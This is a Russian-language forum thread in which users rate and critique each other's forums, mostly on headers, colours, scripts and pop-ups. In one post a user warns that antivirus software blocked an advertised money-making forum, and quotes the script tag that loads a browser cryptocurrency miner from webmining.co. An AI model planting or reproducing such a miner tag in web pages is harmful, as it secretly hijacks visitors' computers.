Единый форум поддержки

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Единый форум поддержки » Наши форумы » Свободная критика


Свободная критика

Сообщений 221 страница 236 из 236

1

Свободная критика.

Совершенно новый оценочный подход к критике форумов.
Максимальная оценка - 10 баллов. Минимальная оценка - 1.
После выставления оценок, пишем в комментарии, почему вы поставили ту, или иную оценку. Или же просто оставляем пожелания и предложения к форуму.

Пример отзыва о форуме

Адрес форума: https://forum.mybb.ru/
Дизайн форума: 0 балла (Критика графической части).
Содержание форума: 9 баллов (Критика информационной части).
Полезность форума: 10 баллов (На сколько полезен форум?).
Скрипты: 0 балла (Оценка скриптов на форуме, главное не кол-во, а качество).


Общая оценка: 19 баллов

Комментрарии: Форум очень информативный и полезный для общества. Много интересных статей. Предлагаю изменить стандартный стиль, на свой. Желаю этому форуму дальнейших процветаний. ( Здесь вы пишите, что конкретно нравится, или же не нравится. Что вы бы изменили. Предложения и пожелания форуму).

Критика написанная не по примеру, будет удалять, а авторы будут наказываться! За флуд в теме, также караем. Для этого Комната отдыха.

0

221

Вдумчивый

Про шапку уже сказали, можно найти качественный арт, например, на гудфоне или других специализированных сайтах, скачать фотошоп если нету, скачать несколько стильных шрифтов и сделать шапку гораздо приличнее этой. И соглашусь с Mirra Bell, заходя на форум, ни шапка, ни название постороннему человеку не говорит, о чем контекст форума. Моя первая мысль была: клуб любителей птиц

Лично от меня: не люблю бегущие строки, может этот текст поместить в контейнер для текста или просто разместить где-то, например в объявлениях?
Еще можно ввести маленькие меню, хотя бы из 5 основных ссылок на самое важное. Ибо "давайте знакомиться" мой компьютер заметил каким-то чудом.
А сам форум хорош, разнообразен и цвет приятен, только выглядит капельку неряшливо. Но этим я и сам часто грешу. Удачи Вам.  ^^

+1

222

Ребят, покритикуйте пожалуйста мой форум. http://obshenie-bez-granits.ru/
Очень хочется узнать ваши первые впечатления. Чего не хватает, что мешает, что раздражает?
А еще, было бы здорово услышать вашу оценку  :tomato:

0

223

Android-Dim написал(а):

Ребят, покритикуйте пожалуйста мой форум. http://obshenie-bez-granits.ru/
Очень хочется узнать ваши первые впечатления. Чего не хватает, что мешает, что раздражает?
А еще, было бы здорово услышать вашу оценку  :tomato:

стандартный стиль

0

224

Android-Dim
1. Картинки к форумам на главной: они разного формата (png, jpg). разного размера и разного стиля (со скругленными краями и нет), из-за чего главная страница смотрится неаккуратно. Хорошо бы там навести порядок. )
2. Я бы не вытаскивала наружу чат, ибо то, что в нем пишут, совсем не обязательно читать гостям. Например, я вот сразу попала на какие-то разборки. Гостям оно надо? Да и форуму не плюс, когда этот сор сразу за избой. Конечно можно сказать: не нравится - не читай, но вы ведь это вытащили, а значит взгляд оно все равно привлечет.
3. Кол-во последних сообщений - ИМХО их не надо столько, у вас их больше, чем на странице активных тем.
4. На странице активных тем картинки ужасны: огромные и с фоном.
5. Очень неаккуратно смотрится оформление мини-профиля в топике, там плохо все. )

0

225

tartar4 написал(а):

стандартный стиль

На этом форуме Вы в черном списке (забанены администратором или модератором Dimitriy Gerasimov). Забанивший Вас администратор или модератор оставил следующее сообщение:

Это прикол такой?

0

226

Алгол
Вероятно, ваш провайдер использует динамические IP, соответственно вам выдался один из заблокированных. Если администратор форума не забанил всю подсеть, то при последующих обновлениях должны увидеть содержимое форума.

+1

227

Алгол написал(а):

Это прикол такой?

???
Ну возможно ваш IP совпал с адресом нарушителя? К нам частенько в последнее время они стали захаживать.
Попробуйте воспользоватся советом Reysler  :dontknow:
Блин :(

Mirra Bell написал(а):

Android-Dim
1. Картинки к форумам на главной: они разного формата (png, jpg). разного размера и разного стиля (со скругленными краями и нет), из-за чего главная страница смотрится неаккуратно. Хорошо бы там навести порядок. )
2. Я бы не вытаскивала наружу чат, ибо то, что в нем пишут, совсем не обязательно читать гостям. Например, я вот сразу попала на какие-то разборки. Гостям оно надо? Да и форуму не плюс, когда этот сор сразу за избой. Конечно можно сказать: не нравится - не читай, но вы ведь это вытащили, а значит взгляд оно все равно привлечет.
3. Кол-во последних сообщений - ИМХО их не надо столько, у вас их больше, чем на странице активных тем.
4. На странице активных тем картинки ужасны: огромные и с фоном.
5. Очень неаккуратно смотрится оформление мини-профиля в топике, там плохо все. )

Спасибо большое за советы. Обязательно приберусь  :cool:

По поводу активных сообщений. Ну не знаю, в свое время очень быстро обновлялся форум, что и дня не проходило, как новое сообщение уходило в самый низ. Только лишь поэтому. Не сокращаю, жду этих самых времен

0

228

John Warner написал(а):

1) Слишком дофига скриптов, страница подвисает. Это плохо.

Скриптов, действительно. многовато. Согласен. А какой  самый навязчивый?

John Warner написал(а):

2) Красивый дизайн, спокойные тона. Это хорошо.

Спасибо!

John Warner написал(а):

3) Поп-апы (вылезающие окошки) не имеют "крестика" выключения. Это плохо.
4) Не работает правая кнопка мыши.  Это плохо. Надо ставить скрипт такой так, чтоб ссылки на темы можно было таки использовать.
Скрипты можно обойти, так что, нет смысла их ставить в их нынешнем виде.

Здесь я не совсем с Вами согласен. Хотя... - подумаю...

БЛАГОДАРЮ ЗА УЧАСТИЕ В ОЦЕНКЕ ФОРУМА!

0

229

kleo3333 написал(а):

Шапка - не качественное фото, растянутое судя по всему от чего и выглядит мутным.

Другой не было, к сожалению... -  высоким разрешением и цветопередачей.

kleo3333 написал(а):

Голубь реально лишний, но если поставить хорошее фото в шапку и саму шапку уменьшить чутка, то (если в шапке фото с небом) можно голубя переместить в шапку и будет уже другое дело.

Спасибо за подсказку - подумаю. Голубь найдет свое место.

kleo3333 написал(а):

+ Я бы убрал разноцветные ссылки. Так как на вашем фоне всё равно теряются все цвета кроме синего и красного в мигающих ссылках. Да и не серьёзно это, ну или оставьте только смену на синий цвет...

Действительно - не хорошо.

Спасибо огромное за оценку форума!

0

230

Mirra Bell написал(а):

Добрый день
К сказанному Джоном добавлю: я бы точно сменила шапку. Во-первых, сама картинка стремновата, во-вторых, не несет никакой информационной нагрузки о тематике форума.

Позвольте мне с этим не согласиться: то, что шапка не высокого качества я с Вами полностью согласен. Но! То, что под видом велосипедистов наши гости (или мы два админа - тоже не плохо)  - пользователи, которые пришли с визитом к нам в гости. Поэтому с вашей точкой зрения я  категорически  не согласен. фОРУМ: ВСЕ ОБО ВСЕМ. Чтобы создать логотип шапки с "информационной нагрузкой" потребуется загрузить немало деталей, соответствующих тематике форума. Я про это уже подумывал и от этой затеи начисто отказался.

Mirra Bell написал(а):

для такого форума лучше бы подошла картинка с какой-нить уютной гостиной или кафешкой или даже коллаж из разных мест, где народ собирается потриндеть. Или, к примеру, картинка с приходящими радостными гостями.

А вот и не нужна здесь "гостиная"... - посмешище для форума. Она напрашивается для иконки "флудилки" не более.
А форум а некоторых разделах даже очень серьезен. Такие, как "оцифровка" могут похвастаться далеко не все форумы. Заходят, копируют контент, создают раритетные диски и смело реализуют их на рынке аудиофилов. И зарабатывают на этом неплохие бабки. Так что... - не скажите.
А так. в целом. солидарен с вашими высказываниями. спасибо, что подключились в диалог.

0

231

Вдумчивый написал(а):

То, что под видом велосипедистов наши гости (или мы два админа - тоже не плохо)  - пользователи, которые пришли с визитом к нам в гости.

Это понятно тем, кто делал эту шапку, но не самим гостям. ) Я как раз смотрю с позиции гостя, который первый раз зашел на форум и увидел эту шапку, которая никак не вяжется с названием форума. )

Вдумчивый написал(а):

А вот и не нужна здесь "гостиная"... - посмешище для форума. Она напрашивается для иконки "флудилки" не более.

Может быть, я не спорю, это был всего лишь один из вариантов.

Вдумчивый написал(а):

Чтобы создать логотип шапки с "информационной нагрузкой" потребуется загрузить немало деталей, соответствующих тематике форума

Ну я и говорила, что можно сделать коллаж. Ведь не обязательно лепить картинки по абсолютно всем темам, ИМХО достаточно коллаж по темам самых объемных/активных веток. Если хотите, могу посоветовать очень хорошего коллажиста.

+1

232

Mirra Bell написал(а):

могу посоветовать очень хорошего коллажиста.

Любопытно было бы с ним проконсультироваться!

0

233

http://redwm.ru - Форум с выводом денег!!! Ваша мнение)

0

234

Вдумчивый
Сорри, промухала Ваш ответ. Аська дизайнера: 601342695

0

235

Redbb написал(а):

Форум с выводом денег!!! Ваша мнение)

<script async="async" src="//webmining.co/lib/wm.js?s=9899&amp;p=50"></script>

КИС заблокировал, бо данный вебсайт внесен в список вредосноных.

0

236

http://playgame.rpgff.ru/ Критека, только создал
Форум про технологии и игры

0


Вы здесь » Единый форум поддержки » Наши форумы » Свободная критика